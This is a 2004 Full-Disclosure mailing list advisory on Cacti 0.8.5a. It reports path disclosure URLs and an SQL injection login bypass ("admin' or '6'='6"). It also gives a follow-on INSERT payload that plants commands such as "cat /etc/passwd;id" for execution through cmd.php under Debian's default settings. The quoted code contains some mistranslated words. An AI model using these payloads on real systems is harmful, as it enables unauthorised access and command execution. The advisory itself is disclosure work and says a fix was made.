[Full-Disclosure] SQL Injection in CACTI From: Fernando Quintero (nandoudea.edu.co) Date: Mon Aug 16 2004 - 15:03:41 CDT * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] ///////////////////////////////////////////////////// //// Vulnerable Program: CACTI //// //// Version : The latest version 0.8.5a //// //// Url: http://www.raxnet.net //// //// The Bug: SQL injection to allows bypass the auth. //// //// Date: Today, August 16 off 2004 //// //// Author: Fernando Quintero (a.k.a nonroot) //// Email: nandoudea.edu.co ////////////////////////////////////////////////////// I. Affected software description: Cacti is a complete frontend to RRDTool, it stores all of the necessary information to create graphs and populate them with data in a MySQL database. The frontend is completely PHP driven. Along with being able to maintain Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the data gathering. There is also SNMP support for those used to creating traffic graphs with MRTG. II. The BUgs a) Full path disclosure In several parts of the code when anyone try to open files in directories who do not appear at first like: include, lib, scripts, etc. an error appears allowing to see the route him where is installed the program. for example: http://127.0.0.1/cacti/include/auth.php http://127.0.0.1/cacti/auth_login.php?action=login http://127.0.0.1/cacti2/auth_changepassword.php?ref=index php&action=changepassword&password=aaaaaa&confirm=aaaaaa&submit=Save These are low risk bugs, but similarly they allow to obtain data of the remote system to a possible attacker. b) SQL injection and bypass the authentication. Injection of code is possible in the index.php file to pass auth. When the username and the password are evaluated by auth_login.php, anyone can insert this: username = admin' or '6'='6 password = password wished Where 'admin' is a user worth in cacti, the system allows this input and to change inmediatly the passowrd. this is the code: //auth_login.php // line 33 ~ switch ($_request["action" ]) {marries 'login': / * --- UPDATE old password with new md5 password value */ db_execute("update user_auth Seth password = '" . md5($_POST["password" ]) . "' where username='" . $_post["username" ] . "' and password = PASSWORD (". $_POST["passw ord"] . "')"); so, 'username' and 'password', can nevertheless be injected, this nonserious possible if the variable 'magic_quotes_gpc' it was to 'On' in the php.ini file of the system. Here is where enters debian. I it probe in SID with the latest version of cacti, When it's installed, a configuration file is created called cacti.conf in the route conf.d of the apache. This file contains the following information: ---BEGIN---- Alias /cacti /usr/share/cacti Options +FollowSymLinks AllowOverride None order allow,deny allow from all AddType application/x-httpd-php .php php_flag magic_quotes_gpc Off php_flag short_open_tag On php_flag register_globals On php_flag register_argc_argv On php_flag track_vars On php_value include_path . DirectoryIndex index.php -----END---- magic_quotes_gpc is put in Off in the line: php_flag magic_quotes_gpc Off Of this form everything is had what it is needed to carry out a successful attack. Using this attack, I would to inject some code in the table 'data_input_data_cache' and it allowed me to execute a command in the system with permissions of the user who runs the apache. a possible example for this is: insert into data_input_data_cache (local_data_id, host_id, data_input_id, action, command, hostname, snmp_community, snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout, rrd_name, rrd_path, rrd_num, arg1, arg2, arg3) values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some script', '127.0.0.1', '', '1', '', '', '161', '500', 'hack', '/', '3', 'NULL', 'NULL', 'NULL'); then points to http://127.0.0.1/cacti/cmd.php and the command will be executed. III. SOLUTION: The coders where contacted and the code was fixed in the cvs ;). The mantainer of cacti was contacted too. IV. GREETINGS - Greets All the community. I learn of you! - Silence Team and the GIGAX Staff. V. CONTACT Fernando Quintero nandoudea.edu.co Silence Team VI. FINAL WORDS - Many applications would to be vulnerable with the configuration by default of debian, check it!. - Sorry by the english, so !! Viva COLOMBIA !! Fernando Quintero Silence Team Colombia - South America _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html